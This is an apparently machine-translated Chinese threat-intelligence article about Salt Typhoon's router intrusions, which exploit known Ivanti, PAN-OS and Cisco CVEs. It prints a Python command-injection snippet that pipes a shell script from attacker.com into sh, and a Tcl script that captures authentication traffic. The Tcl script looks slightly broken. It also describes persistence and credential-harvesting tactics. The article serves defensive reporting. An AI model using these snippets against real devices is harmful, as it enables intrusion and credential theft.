在过去的几年里，某高级持续威胁 （APT） 组织的协调一致的活动利用了企业级路由器中的关键漏洞，在全球电信和政府网络中建立了长期立足点。

这些参与者通常以 Salt Typhoon 和 OPERATOR PANDA 等绰号识别，系统地针对来自领先供应商的提供商边缘 （PE） 和客户边缘 （CE） 设备，利用公开披露的常见漏洞和暴露 （CVE） 来获得最初未经授权的访问。

他们的作表现出高度的隐蔽性，将多个漏洞链接起来横向移动并规避传统的检测工具。

典型的多阶段攻击流从 Web 组件注入开始，最终以嵌入式数据包捕获结束。

在最初的入侵尝试中，威胁行为者通常会利用 Ivanti Connect Secure 中的 CVE-2024-21887 和 Palo Alto Networks PAN-OS GlobalProtect 中的 CVE-2024-3400。

这些缺陷允许通过精心设计的 HTTP 请求进行远程代码执行，从而为攻击者在路由器的特权管理界面中提供了立足点。

虽然研究人员指出，一旦实现访问，攻击者就会迅速转向，利用较旧的漏洞，例如 Cisco IOS 智能安装中的 CVE-2018-0171 和 IOS XE Web 管理模块中的 CVE-2023-20198，从而创建可靠的升级和持久性链。

Cyble 分析师发现，公开可用的概念验证漏洞利用代码正在快速武器化，这些代码通常在 Python 或 Tcl 脚本中定制，以适应特定的路由器环境。

下面显示了这些活动中使用的代表性片段，演示了通过 Web 管理界面进行命令注入：-

import requests

url = "https[:]//192.0.2.1/+CSCOE+/translation-table?type=misc&text_scale=1"
payload = {"command"[:] "system ('curl http[:]//attacker.com/shell[.]sh | sh')"}
response = requests[.]post (url, data=payload, verify=False)
print (response[.]status_code, response[.]text)

利用这种技术，攻击者可以实现远程 shell 执行，随后部署自定义工具来收集配置文件、凭据和会话数据。

坚持策略

在初始访问后， APT 组织专注于将自己深深嵌入路由器的运行环境中，以确保使用寿命。

他们更改访问控制列表 （ACL） 以将攻击者控制的 IP 地址列入白名单，并打开非标准端口（例如 32768 和 8081）以进行秘密访问。

在许多情况下，不法分子利用思科的嵌入式数据包捕获 （EPC） 功能来窃取 TACACS+ 和 RADIUS 身份验证流量，从而有效地收集明文凭证。为了实现自动化，他们部署了存储在路由器闪存中的基于 Tcl 的脚本：

package require json
set cap Cmd [list "ip" "packet" "capture" "point-to-point" "rtl" "1000"]
exec {*}$capCmd > flash:auth_capture[.]pcap

这些脚本在启动时运行，通过更改的启动配置触发，创建持久性 PCAP 文件，这些文件会定期通过加密的 GRE 隧道泄露。

通过纵 AAA（身份验证、授权、记帐）配置，攻击者重定向日志并禁用警报功能，从而有效地使企业防御者失明。

通过这些方法，受感染的设备成为更广泛的企业渗透的可靠启动板，使 APT 行为者能够保持数月甚至数年的隐秘存在。